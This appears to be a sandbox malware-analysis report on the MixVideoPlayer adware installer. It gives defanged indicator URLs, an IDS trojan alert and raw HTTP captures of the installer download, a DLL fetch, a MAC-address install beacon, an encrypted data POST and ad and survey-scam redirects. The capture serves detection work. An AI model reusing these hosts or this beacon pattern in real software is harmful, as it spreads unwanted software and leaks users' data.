hxxp://api.yousoftpe.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/i-download.png	5.196.157.0
hxxp://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml?d9db319c-edf4-4c23-ae40-ba3c3738dc0f	185.2.179.74
hxxp://3p6.popularfastchannel.com/?s1=&s2=&s3=	50.19.123.133
hxxp://api.yousoftpe.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loading-install.gif	5.196.157.0
hxxp://staticrr.mixvideoplayer.com/sdb/1d/MixVideoPlayerUpdate.xml?44812e3f-d43a-4eb7-8bef-8c0aefa2ce28	185.2.179.74
hxxp://api.yousoftpe.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/bullet-short.gif	5.196.157.0
hxxp://www.yousoftpe.com/BesH3gE9/pop-up/	5.196.157.1
hxxp://static.yousoftpe.com/84/MixVideoPlayerSetup.exe	5.196.157.0
hxxp://api.yousoftpe.com/__maxpower__/render_template/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab?language_code=en	5.196.157.0
hxxp://api.yousoftpe.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/style.css	5.196.157.0
hxxp://api.yousoftpe.com/ded3de8ff3bf627ff6d83ea047844f0e91a95b1e757f4fb79ebb72e5215a43a3f1881186e28a14e9dcb327b6a4c44792123f9c4262bdb9bd14978d4785a634ebd1ab2fad42c3ac69be4103bbb5ace2eb9d729a9f30d3fd91	5.196.157.0
hxxp://api.yousoftpe.com/bf347a9c266220e0e770ae69b02713632b85a487869a70dd771b22fb58989f9aa3ebc8497ffa6be434bb903bf4e644ccef8f18175e98e50b	5.196.157.0
hxxp://www.webtrackerplus.com/?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.&ce_cid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.	192.230.78.223
hxxp://staticrr.mixvideoplayer.com/sdb/df/ffmpeg.zip	185.2.179.74
hxxp://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js	216.58.209.202
hxxp://api.yousoftpe.com/5c9fcfb67b8b50caf3ff80fda5f90c17f2908cdc58dc8a332caa164c680aca4d3d2a2f887f13872573de854a95eea05b833f5cf0a0c8699f	5.196.157.0
hxxp://static.api.yousoftpe.com/d5/msjava.dll	5.196.157.0

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /sdb/1d/MixVideoPlayerUpdate.xml?2fcbb09b-96f8-4afb-9e97-d73ce315d8d3 HTTP/1.1

Host: staticrr.mixvideoplayer.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:48 GMT

Content-Type: text/xml

Content-Length: 671

Last-Modified: Fri, 05 Jun 2015 11:17:55 GMT

Connection: keep-alive

ETag: "55718563-29f"

Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8"?>..<LastVersion>...&l
t;url>hXXp://staticrr.mixvideoplayer.com/sdb/84/MixVideoPlayerSetup
.exe</url>...<version>1.0.0.20</version>...<Track
Activity>true</TrackActivity>...<TrackErrors>true</T
rackErrors>...<vast active="true">....<adnum>3</adnu
m>....<adurl countries="US,RU,BR,MX,DE,FR,IN,GB,ES,TR,AR,IT,IL,J
P,CA,IR,AU,NL,ID,CO,PK">.....<![CDATA[hXXp://ads.adaptv.advertis
ing.com/a/h/fUUYX443fr3iHLf1b0DAy3MvZmqN m4YhR8Ql84ugxaUwnVer0nkAl4RaF
w4ippAh4iKfLnbLyk=?cb=[CACHE_BREAKER]&pageUrl=apps://mixvideop
layer.com&eov=eov]]>....</adurl>...</vast>...<Coll
ectorLTV>collector-pre.ltv-analytics.com:8080</CollectorLTV>.
.</LastVersion>..

GET /click/jGJunWecqZmPY2mWYcp6w4iQa5tnnH6Wi2SYmGakfZSJkGqaYKOBl7dia5Vmon2X?dp=NTN8NTc5fFVBfDF8MXx8|34ee69d9819b5a94df7268d81470e3f3-17-62|9d806520-0be2-11e5-8e44-f8bc125381b8 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: network.adsmarket.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx/1.6.2

Date: Sat, 06 Jun 2015 00:26:05 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.38

Set-Cookie: ce-visitor-iWZrnWWe=imGQ35nVesyjoHuygN672oh4oNBn4XveiWKQml6bepI; expires=Tue, 21-Jul-2015 00:26:05 GMT; path=/; domain=network.adsmarket.com

Set-Cookie: ce-click-iWRymmajfJe3Z2uZYqSAnIpq=iWRymmajfJe3Z2uZYqSAnIpq; expires=Sun, 07-Jun-2015 00:26:05 GMT; path=/; domain=network.adsmarket.com

Location: hXXp://VVV.webtrackerplus.com/?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.&ce_cid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.
0..HTTP/1.1 302 Moved Temporarily..Server: nginx/1.6.2..Date: Sat, 06 
Jun 2015 00:26:05 GMT..Content-Type: text/html..Transfer-Encoding: chu
nked..Connection: keep-alive..X-Powered-By: PHP/5.4.38..Set-Cookie: ce
-visitor-iWZrnWWe=imGQ35nVesyjoHuygN672oh4oNBn4XveiWKQml6bepI; expires
=Tue, 21-Jul-2015 00:26:05 GMT; path=/; domain=network.adsmarket.com..
Set-Cookie: ce-click-iWRymmajfJe3Z2uZYqSAnIpq=iWRymmajfJe3Z2uZYqSAnIpq
; expires=Sun, 07-Jun-2015 00:26:05 GMT; path=/; domain=network.adsmar
ket.com..Location: hXXp://VVV.webtrackerplus.com/?page=ec&a_aid=51cced
n87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj0hKoBMRsq
v0Ggk9v1z11W5000.&ce_cid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000...0..

HEAD /84/MixVideoPlayerSetup.exe HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: static.yousoftpe.com

Content-Length: 0

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:04 GMT

Content-Type: application/octet-stream

Content-Length: 3789056

Connection: keep-alive

Last-Modified: Fri, 05 Jun 2015 11:17:43 GMT

ETag: "55718557-39d100"

Accept-Ranges: bytes

GET /ltv/install/?idapp=23&action=install&mac=000C290DDD4A&country=US HTTP/1.1

Host: ltv-pre.tguhost.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Content-Type: xml

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.7

Cache-Control: no-cache

Date: Sat, 06 Jun 2015 00:26:39 GMT
39..<?xml version="1.0" encoding="utf-8"?>.<result>1</r
esult>..0..

GET /?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: asmzz.exclusiverewards.startree.science

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.4

Date: Sat, 06 Jun 2015 00:26:07 GMT

Content-Type: text/html

Transfer-Encoding: chunked

X-Powered-By: PHP/5.3.3

P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

Set-Cookie: ci_session=xZprAEsUzrdEkX6CbrGXhhft/rFHoGKI5+XwEnsrw/UHP3QkX7eYHCgjPENvAfqx+2gfFYRGDY9RhjsMfhdPeddLnICtx/ySuLVBm+TTMp3JEd1yQOnzw5k4Gfqiuqu5Zf48gENlW4xApVM1kkLqPsTEj4cfeSfyOYq3Mq4Ie0+/G/iYROU1tbXakSVWerAv5B6gvaKB6VxBX8b/FtmEvP+tll3/qzP2aV1gisLlLEHNLVr9bIAukUB/pV1EwnGd5NCDfOeooNaSD0k7N4zH8NGS5WIKchU/DZmuvkr3MAKdE+1CN7nZ3dpQZaM02PlZD9bYXsrTGncl/kL/P3qaqFCEO2h4mM0JSFPgf6BsmHjCjP5f7qEQjdSXlds5hq+yMODKxDr3/0G4WNZQ3/rBNkWFunA0evJZSXGsTKLtme7Q43zJLSDBjs4/GoXbwdSBecmk4KkIqFxDTRPQZfALhg==; expires=Sun, 07-Jun-2015 00:26:07 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

X-Source: Mini

Set-Cookie: id=XNSX.-r10845-t68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: SITE_ID=73001201; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: sov=73001201; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tov=deleted; expires=Fri, 06-Jun-2014 00:26:06 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: mov=nr.ytsurvey.mini; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: redid=10845; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: gsid=68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: ref=deleted; expires=Fri, 06-Jun-2014 00:26:06 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: URI=sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: templateid=2582; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: version=227198; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tags[2582][expand_enable]=-1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tags[2582][alert_enable]=1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tags[2582][audio_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tags[2582][pop_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tags[227198][expand_enable]=-1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tags[227198][alert_enable]=1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tags[227198][audio_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tags[227198][pop_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: content=227198; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: vid=40637; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: log_73001201=1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.exclusiverewards.startree.science

Set-Cookie: id=XNSX.-r10845-t68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: SITE_ID=73001201; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: sov=73001201; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: tov=227198; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: mov=nr.ytsurvey.mini; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: redid=10845; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: gsid=68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Set-Cookie: ref=deleted; expires=Fri, 06-Jun-2014 00:26:06 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

X-Sov: 73001201

X-Rot: 227198

Set-Cookie: tags[2582][iframe_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science

Expires: Mon, 01 Jan 2001 00:00:00 GMT

Cache-Control: no-cache

Pragma: no-cache

Set-Cookie: noshid=hljlntjxhrlrjrz; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.startree.science

Content-Encoding: gzip
d37.............[.o....Y. ....7.....lY..:k...b.C...$=Y.).%)..0 ..~...(
<...u..b.eM\;v.....P.......H.....X".....w.{..O....n.....%.tZ. O....
T...zy".*Mf..P....5..Yh...N...w....Y.q[]_..4t..Nv.cr.......M'...Y..X6w
...\.^.X..qTG.e. ....~.....q..s....K..{....{.=.>.nA.....Yw..c...l)'
.  .f...l.. .r.=eS^5.U. .j.5.Em9M...{.........\.......l.\..V.US.5..x..
:.ej...\....=W.5U-c..V.n[..SY..xg......... Kw*...t..f..b.f.9..h\. .Y\[
...nr.H..#z.#.\....&}..dU.(M..{...@i_.t P..!..)..h.......lor.3....*...
../..F...7..-p..T..........."...s..ZS.t..O.....Q[.J..H..?....)q...y.H.
....]. ...-.......Y!......q...~9.....u...nw.....;..M..,........[.u.!..
..m.(......}@..s..x~.t.O....D&~.B......._.[7......t.D#....)P.%u.U...&l
t;.. .q...BV.@. -...S.......^......C....J....KU........o.....TW.YMSl{A
......P7y.][email protected]..
...Z.#......[A....K1..C...[..%<=.3a.U.i...:')*j........W.......=cz.
...... "y....jB..t...S).;........e$.. .3&.p..|.p..>O...............
.....{....}....X:w.......&c...7b#:?f..'.K....................1...u..}p
.=..Q....f.....Y......7(.8........_.U.:....M.f...p..!&.z$3w.}.n..1....
I.S..c..<...3.."gFh.Q..)......8#4...........J..3c.........f........
...g.......}O2!=..b.........D.......%0.#..}(1t/..}i..h>....\A...F..
.h#f(,f0.7..o.c....`.3aJ.P..........?]..9.]....."...s.6..!Q..X$..EoB..
b......5. .J..r....."C..../........'....>.Z.q.Kq....Y...*z.UE...a..
&.<."r...=d..7.Q>}..0......>.=yK.c<.ww.W..0..9.6`..B.K6...
.....(...-;&B........qA)Ug.^....$....<.....`{.gRutfa...X.s.}.h.
<<< skipped >>>

GET /templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style.css HTTP/1.1

Accept: */*

Referer: hXXp://asmzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: asmzz.exclusiverewards.startree.science

Connection: Keep-Alive

Cookie: ci_session=xZprAEsUzrdEkX6CbrGXhhft/rFHoGKI5+XwEnsrw/UHP3QkX7eYHCgjPENvAfqx+2gfFYRGDY9RhjsMfhdPeddLnICtx/ySuLVBm+TTMp3JEd1yQOnzw5k4Gfqiuqu5Zf48gENlW4xApVM1kkLqPsTEj4cfeSfyOYq3Mq4Ie0+/G/iYROU1tbXakSVWerAv5B6gvaKB6VxBX8b/FtmEvP+tll3/qzP2aV1gisLlLEHNLVr9bIAukUB/pV1EwnGd5NCDfOeooNaSD0k7N4zH8NGS5WIKchU/DZmuvkr3MAKdE+1CN7nZ3dpQZaM02PlZD9bYXsrTGncl/kL/P3qaqFCEO2h4mM0JSFPgf6BsmHjCjP5f7qEQjdSXlds5hq+yMODKxDr3/0G4WNZQ3/rBNkWFunA0evJZSXGsTKLtme7Q43zJLSDBjs4/GoXbwdSBecmk4KkIqFxDTRPQZfALhg==; id=XNSX.-r10845-t68; SITE_ID=73001201; sov=73001201; mov=nr.ytsurvey.mini; redid=10845; gsid=68; URI=sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68; templateid=2582; path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; version=227198; tags[2582][expand_enable]=-1; tags[2582][alert_enable]=1; tags[2582][audio_enable]=0; tags[2582][pop_enable]=0; tags[227198][expand_enable]=-1; tags[227198][alert_enable]=1; tags[227198][audio_enable]=0; t
HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 06 Jun 2015 00:26:10 GMT

Content-Type: text/css

Last-Modified: Fri, 11 Oct 2013 18:30:45 GMT

Transfer-Encoding: chunked

Expires: Tue, 31 May 2016 00:26:10 GMT

Cache-Control: max-age=31104000

Pragma: public

Cache-Control: public, must-revalidate, proxy-revalidate

Content-Encoding: gzip
9ec.............Z[o...~...5A1;.:.%.....L6.,....E.7..(..%*.............
l[`k#...9<......,....'...o.~u.v...7.....Td..<...>...9.E..@<
;.'...I.3..%J=..(.P.B...(d<zx.. .(....a.pT.|.!..%.*....(..xLPL.....
.%<.....y....=..U8 P.a.P%[email protected]. .....(D5.(". %.aM...q.j..E.%,.
`../3.p.d...<F.......<GB.]$..$R.....$b...].........]....N....I..
y-...~..ZT....]..7'.:9Q\.....S....<'............!...C..8..xl{.u.\'.
N@<....7.[.,.DI2..0\p'&.l.IxTW.......r.[^.}...t.2..........I..Z....
...EL"^b)}........B.%.wiKViP2I.srBb.}D....@A?.............Br.&I.Zu..3.
....>uj]4 .;.~..Y.sG:....sF.!.M...4..X9/......."F...|.vB....md..h.F
.-0..D......_..-.D.-UT.;..b....S)&.B..(._;.........yLNQ.........1.1rpI
1.?....hr#=.. m8Z.....!..v`'y|..%.....fxG....6.m3L...M>.......s.`..
.LpLB......x.3f4v......H%|.b...U.c..F..<........p...,.l.....Lc.....
zC..K......m......(..K.....u6k=..a..9Z.:=..j.....1.\.....f.Q.V.......^
N...U..q...f.8RN.......).J.r,j.......m..eOn.t>..gA....R......m.R...
.E...>..&....E.]6Zn.M..R-..8...:....u..._..C..s....b?,.s%......`.h.
vf!.........LnLs.J..F'..HG.......5.4f.C ......mo...7...r.....&..Z...;.
.d. oJ.z...F.L..'p.....E.e..q..ptP>.......]Mx.eK..&...*i...:...AZ~"
73......C....Smp..V3...C..ZHZ.........F.... ..G>..*..w.8A....(;ky]J
....Z.....&.)._.u.^....A..2Afo'm.6......3.Kg5^`....Z-..........F.".:.c
....=..G<.5a.3)..u.Gl%.......b_tP.....d^.N ...gO..........|..%.v;.J
&.......s...X. ....~.X.t=.....&..v.]'..J...6...../.$....K......-.r2 ..
.7.fn.GJYf...B..."..W....NZ.V....:5,2.m...l.hk..M.S..'.....;e. HRJ
<<< skipped >>>

GET /templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/js/script.js HTTP/1.1

Accept: */*

Referer: hXXp://asmzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: asmzz.exclusiverewards.startree.science

Connection: Keep-Alive

Cookie: ci_session=xZprAEsUzrdEkX6CbrGXhhft/rFHoGKI5+XwEnsrw/UHP3QkX7eYHCgjPENvAfqx+2gfFYRGDY9RhjsMfhdPeddLnICtx/ySuLVBm+TTMp3JEd1yQOnzw5k4Gfqiuqu5Zf48gENlW4xApVM1kkLqPsTEj4cfeSfyOYq3Mq4Ie0+/G/iYROU1tbXakSVWerAv5B6gvaKB6VxBX8b/FtmEvP+tll3/qzP2aV1gisLlLEHNLVr9bIAukUB/pV1EwnGd5NCDfOeooNaSD0k7N4zH8NGS5WIKchU/DZmuvkr3MAKdE+1CN7nZ3dpQZaM02PlZD9bYXsrTGncl/kL/P3qaqFCEO2h4mM0JSFPgf6BsmHjCjP5f7qEQjdSXlds5hq+yMODKxDr3/0G4WNZQ3/rBNkWFunA0evJZSXGsTKLtme7Q43zJLSDBjs4/GoXbwdSBecmk4KkIqFxDTRPQZfALhg==; id=XNSX.-r10845-t68; SITE_ID=73001201; sov=73001201; mov=nr.ytsurvey.mini; redid=10845; gsid=68; URI=sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68; templateid=2582; path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; version=227198; tags[2582][expand_enable]=-1; tags[2582][alert_enable]=1; tags[2582][audio_enable]=0; tags[2582][pop_enable]=0; tags[227198][expand_enable]=-1; tags[227198][alert_enable]=1; tags[227198][audio_enable]=0; ta
HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Sat, 06 Jun 2015 00:26:10 GMT

Content-Type: application/javascript

Last-Modified: Fri, 11 Oct 2013 18:30:48 GMT

Transfer-Encoding: chunked

Expires: Tue, 31 May 2016 00:26:10 GMT

Cache-Control: max-age=31104000

Pragma: public

Cache-Control: public, must-revalidate, proxy-revalidate

Content-Encoding: gzip
9c0..............iw.6... .....LIv.m..]?'N.^.g7i..q.(..XS.J.>bi.....
.......$....`........} ....>..e.._.d...;.........v2xM.4..HY........
..w.h..}gCF...o.%........... S..,...2.....E.....$...q..lLD.\d..{....[.
...N.l....v..By...a.e<.D.[....'.i|6...z....x...u~.F..d..V*$..-....^
.-..Rj.cqU.{7 [email protected]..].$.5..7mc$./..)-..$...=..).....k...9Ox(...e..C
.z..&..\Y.\_.../..HQ....Q.GC.Ac...F..Qi.A.....i......|...Q..L\R. .J}l[
..=?...$.s.d....\s......c......@7^0...mD.X&.b.|.Ax>.D.FN.9.......-.
f..........D..SFf>.."....i...&..`E:..w..{.fd!.q.2...IP$.66."H.?. ..
_....'...%..........i...F .b.......g({....V.$B.d..1....3g..P........3.
.9..q...?.`!O,.<.R9lt..Y..p....Lb.D....%.1.P...h2...6.\>"..#....
.....A......8....U....)....$D.....L...8..9.J.8.{..K.%.[\..[.o...!]c.S;
m).[.Z.....)...m.p.\...T..#py..Q"......9..P..E..<..|.lS...]r$L.a...
= M....."......hV..mr..._U2.J<..f<...TJ.....H8..*"@L..m.]p.%...Y
8..1......E.Ji1. .F}..l/....EvlO.......P..Z..G.S....X..4...A;mv..e..G.
clV.TU..U...a.....!.`O.9..V....vVx..._.....B...8N.A=Vk......wY_......{
...1.....T..S2.r.......H......k..aytM..b...c<...6...ri1..A.V..^...V
T....q..'.6..L.C..p L....ZU ...)...h......~..nW..h9.s.e..F3.M...v.Z...
D...Z..;...(.t.......`A.. M.9...p..z..S(]y-.....@...._\.P.f.v6..1hTK.:
*..`.-7....{.CT..P..%j...m.b....;I.\...a..r.3.'...YG.Z.Wf.*z.F.^.%6..m
......S.....X.3.g.WB..S....t....'.....'...Pj..k....j.NV..eu....(..2T.b
.)[email protected]/j....a.....W.J./<...v..7....:;....MA........n.....p....@
..y7.dT..ts..R..8.....B.L;lA.F<m1U.ZN[.l;-.............W%..;:y.
<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/bullet-short.gif HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:09 GMT

Content-Type: image/gif

Content-Length: 54

Last-Modified: Fri, 27 Feb 2015 14:06:53 GMT

Connection: keep-alive

ETag: "54f079fd-36"

Accept-Ranges: bytes
GIF89a.............!.......,...................P..U..;HTTP/1.1 200 OK.
.Server: nginx..Date: Sat, 06 Jun 2015 00:26:09 GMT..Content-Type: ima
ge/gif..Content-Length: 54..Last-Modified: Fri, 27 Feb 2015 14:06:53 G
MT..Connection: keep-alive..ETag: "54f079fd-36"..Accept-Ranges: bytes.
.GIF89a.............!.......,...................P..U..;....


POST /5c9fcfb67b8b50caf3ff80fda5f90c17f2908cdc58dc8a332caa164c680aca4d3d2a2f887f13872573de854a95eea05b833f5cf0a0c8699f HTTP/1.1

User-Agent: dBrowser 3 CallGetResponse:3

Host: api.yousoftpe.com

Content-Length: 4006

Cache-Control: no-cache

cdata=86394263D6DED7AD3ED013DFEF7E64F6FD7F7EB6471F6E1008FAF67D6BFDB01B26EAAA801BC7C09F4151D3761C9F974F6921D434084F69EB0E2262EC981EFAF4B71B6DE53AB1621839F9301B469E85E3DEEA269604ED17849843D57DA5D052460EA403F0E2730A705291EE1BB655062579317F3835A3F1C8D611E8D59DE4E29330C729C3611175A91D6C4B2CA57BF51B8A93E962C0C6C7C6FD68E8538140D7179A18D7BCE232EF1C1C0A61A0FC128EFA35879CE800C42FE7ED6DD7260C2A734FD494B2C250259201C61772E42F1834C5441D06379FFA40F46894C31933E48BDA957A476C0D2DA52AB22D25163CA51C0265C33430C2CCDC2445DB733784FAF2387F2028217CF16B47693BE71A94A31D04FEC270C62AA77F5607A856310D3163700B9358E90F7D346FCC65CFCEB261A852FC730CFC5512A46C99D7521B0CEB0A7AB836EB90C4968390E70FBE66142A024A56DCD1FF2C37F69104A76D9C65E8C995026485C84E02B717CB69E1DEE79A5B7163A85418804D4732B853988DC447F077EDBE26ADDD2D6491B936C16D6FDA0CBE8C32A9E47A43291E06605D7327A003427FA57088F709FEA77EF306CA4BFEF54BDAEDF7E4F54FF66DB4CD09C36F722294E15B4466C6626B87D934840432CEAB2D0F2D5CD256D16454ADD9ACD51EA2376FD7ABDAC2DC20C1CE4FC529377AACD629FFED22A89B2F4422D24E82882AF7AA2C1A16BB81C3838A8D3EB3E18BBEF18D60DC1B234AC6A358521720470391E8CFDF41099A29F798B6EC70E827139413E513DA51D7708F4957B91AC64EBB6FD47BCACAF081BD0D876AEEB0C3A09A3ED5BA4F85EBBC8F97F88B9899F77E1B84AD58BCEBFBA8B236534DAF1C60FCFEF16CB364963AB371E91C1C08792FDC29952F850065D8D
HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:38 GMT

Content-Type: text/plain

Transfer-Encoding: chunked

Connection: keep-alive
7..MAXTHX...0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 06 Jun 2015 
00:26:38 GMT..Content-Type: text/plain..Transfer-Encoding: chunked..Co
nnection: keep-alive..7..MAXTHX...0..

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/style.css HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:25:59 GMT

Content-Type: text/css

Content-Length: 19034

Last-Modified: Tue, 03 Mar 2015 18:13:58 GMT

Connection: keep-alive

ETag: "54f5f9e6-4a5a"

Accept-Ranges: bytes
/* Template Template Videoupdater */...article,aside,details,figcaptio
n,figure,.footer,header,hgroup,menu,nav,section {..display:block;.}.p,
 h5, h4, h3, h2, h1, span, ul, li, form, input, textarea {..margin:0;.
.padding:0;.}.body {..margin:0 auto;..background-color:#323333;..width
: 555px;..height: 458px;..color:#b5b5b5;..font-family:Arial, Helvetica
, sans-serif;..scrollbar-face-color: #666666;..scrollbar-highlight-col
